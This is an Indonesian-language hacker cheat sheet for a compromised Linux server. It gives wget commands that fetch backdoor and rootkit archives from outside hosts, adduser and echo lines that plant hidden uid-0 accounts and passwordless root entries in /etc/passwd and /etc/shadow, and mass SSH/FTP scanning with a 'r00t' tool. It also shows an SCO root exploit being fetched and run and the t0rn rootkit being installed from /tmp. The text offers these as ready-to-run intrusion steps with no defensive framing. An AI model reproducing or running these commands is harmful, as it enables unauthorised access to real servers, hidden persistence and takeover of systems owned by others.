http://IP-yg-kamu-hack/~apache
=================================================================================================
BACKDOOR
=================================================================================================
wget http://xvak-1.150m.com/tool/tk8.tgz
wget http://xvak-1.150m.com/tool/bk2.tar.gz
wget utay-doyan.cc/shv4.tar.gz
wget www.radikal.org/backdoor.tar.gz
=================================================================================================
: COMMAND ADDUSER DALAM ROOT :
=================================================================================================
1. /usr/sbin/adduser vadmin -g root -d /var/vadmin
passwd vadmin
2. /usr/sbin/adduser -u 0 -g 0 apache -d /dev/apache
passwd apache
/usr/sbin/adduser mails -d /usr/local/share
passwd mails
3. /usr/sbin/adduser gdm -d /usr/local/gdm ; chown gdm.gdm /usr/local/gdm
passwd gdm
4. /usr/sbin/adduser http -g root -s /bin/bash -d /var/.asl
passwd http
5. /usr/sbin/adduser apache -m -d /.apache
passwd apache
6. echo "samba:0:0::/.apache:/bin/bash" >> /etc/passwd
7. echo "mail::0:0::/.mail:/bin/csh" >> /etc/passwd
8. echo "mail::0:0:::" >> /etc/passwd
9. echo "mail::0:0:::" >> /etc/shadow
10. echo "root:x:1001:10::/:/bin/bash" >> /etc/passwd
=================================================================================================
: COMMAND DELUSER DALAM ROOT :
=================================================================================================
1. cd /usr/sbin
userdel namauser
2. /usr/sbin/userdel namauser
=================================================================================================
: NGE-ROOT SSH LINUX PORT 22 :
=================================================================================================
1. wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
3. cd grabbb
4. gcc -o grabbb grabbb.c
5. ./grabbb -a IP -b IP port, Misalnya :
6. ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
=================================================================================================
wget www.suckmyass.org/ssh-scan8.tar.gz
tar ssh-scan8.tar.gz
cd ssh-scan8
./r00t 203.20 -d 4 <--- scan massal SSH
./r00t 203.20 -d 2 <--- scan massal FTP
./r00t 203.20 -d 3 <--- scan massal FTP
./r00t 134.7. -d 4
=================================================================================================
: NGE-ROOT UNTUK OS SCO :
=================================================================================================
wget www.renjana.com/sco
./sco IP
=================================================================================================
: PASANG BACKDOOR :
=================================================================================================
1. cd /tmp
2. wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
3. tar -zxvf tk.tgz
4. cd tk
5. ./t0rn meiyer 5000
=================================================================================================